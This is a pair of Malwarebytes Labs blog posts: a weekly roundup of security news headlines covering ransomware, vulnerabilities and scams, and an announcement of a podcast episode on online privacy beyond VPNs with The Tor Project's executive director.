A week in security (Oct 18 – Oct 24)

Last week on Malwarebytes Labs

  • Multiple vulnerabilities in popular WordPress plugin WP Fastest Cache.
  • “Killware”: Is it just as bad as it sounds?
  • REvil ransomware disappears after Tor services hijacked.
  • Protect yourself from BlackMatter ransomware: Advice issued.
  • q-logger skimmer keeps Magecart attacks going.
  • How to delete your Snapchat account.
  • High school student rickrolls entire school district, and gets praised.
  • Chrome targeted by Magnitude exploit kit.
  • Update now! Chrome fixes more security issues.
  • A bug is about to confuse a lot of computers by turning back time 20 years.
  • We dig into the Game Players Code.
  • Ransomware: Why do backups fail when you need them most?

Other cybersecurity news

  • Sinclair Broadcast Group says it suffered a ransomware attack and has had data stolen. (Source: NPR)
  • After games boom in pandemic, gangs are using phishing and malware to cheat fans. (Source: The Guardian)
  • A vulnerability in the trial version of WinRAR has significant consequences for the management of third-party software. (Source: PT Security)
  • Slack contains an XSLeak vulnerability that de-anonymizes users. (Source: The Daily Swig)
  • Gummy Browsers, a new fingerprint capturing and browser spoofing attack, lets attackers spoof tracking profiles. (Source: BleepingComputer)
  • Elaborate CryptoEats food delivery scam steals $500,000 in minutes. (Source: Vice)
  • Phishing campaign targets YouTube creators with cookie theft malware. (Source: Google Threat Analysis Group)
  • Dutch forensic lab decrypts Tesla’s driving safety data and finds a wealth of information. (Source: The Record)
  • Australia announces critical infrastructure reforms to protect the essential infrastructure in the event of a major cyber-attack. (Source: homeaffairs.gov.au)
  • Popular NPM library hijacked to install password-stealers and miners. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (Oct 18 – Oct 24) appeared first on Malwarebytes Labs.

Beyond the VPN: Ultimate online privacy, with The Tor Project’s Isabella Bagueros: Lock and Code S02E20

“What does online privacy mean to you?”

This beguilingly simple question can produce dozens of overlapping and distinct answers, all depending on who you ask. A VPN service might tell you that online privacy means obscuring your IP address and hiding your Internet activity from your Internet Service Provider. A privacy-forward web browser, like Mozilla, or Brave, might tell you that online privacy means being protected from third-party tracking and surreptitious data collection. And an anti-surveillance activist or lawyer at an organization like the American Civil Liberties Union or Electronic Frontier Foundation might tell you that online privacy means shutting down sweeping surveillance laws in the United States like Section 702 and Section 215.

While Lock and Code has spoken to several guests about online privacy in the past, we wanted to revisit the topic because of its intersection with VPNs, the increasingly popular tools that consumers are using to protect some of their privacy online. We understand the value of a good VPN—our company makes one after all—but we also cannot deny that there is an entire world of online privacy that exists beyond the VPN.

Today, on the Lock and Code podcast with host David Ruiz, we speak to The Tor Project Executive Director Isabella Bagueros about what other types of online tracking users are vulnerable to, even if they’re using a VPN, how else users can stay private online without becoming overwhelmed, and why users should be careful about trusting any one, single VPN.

“One of the issues with VPNs, nowadays, is that they are controlled. It is a private network indeed, because it is controlled and centralized under an organization or company. They literally control all the servers, all the infrastructure that they are providing you, and I think that is one of the things that you want to avoid. You want to avoid having a single point of failure, or a single point of trust.”

Isabella Bagueros, The Tor Project executive director

Tune in to hear all this and more on this week’s Lock and Code podcast, by Malwarebytes Labs.


You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post Beyond the VPN: Ultimate online privacy, with The Tor Project’s Isabella Bagueros: Lock and Code S02E20 appeared first on Malwarebytes Labs.